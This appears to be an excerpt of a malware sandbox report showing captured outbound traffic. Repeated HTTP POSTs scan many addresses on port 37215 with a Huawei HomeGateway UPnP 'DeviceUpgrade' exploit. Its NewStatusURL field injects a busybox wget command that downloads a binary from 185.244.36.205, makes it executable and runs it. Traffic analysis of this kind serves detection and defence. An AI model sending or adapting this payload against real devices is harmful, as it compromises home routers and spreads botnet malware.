                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              618192.168.2.1538012138.80.166.15237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223470926 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              619192.168.2.155330845.55.240.15337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223500013 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              620192.168.2.1553084197.175.211.22437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223527908 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              621192.168.2.1543062222.21.1.8037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223576069 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              622192.168.2.155884645.48.41.137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223579884 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              623192.168.2.1550616122.20.215.7937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223606110 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              624192.168.2.1560200197.117.71.9037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223606110 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              625192.168.2.154230094.23.61.2637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223655939 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              626192.168.2.154189037.176.56.2937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223656893 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              627192.168.2.155303694.36.72.5137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223689079 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
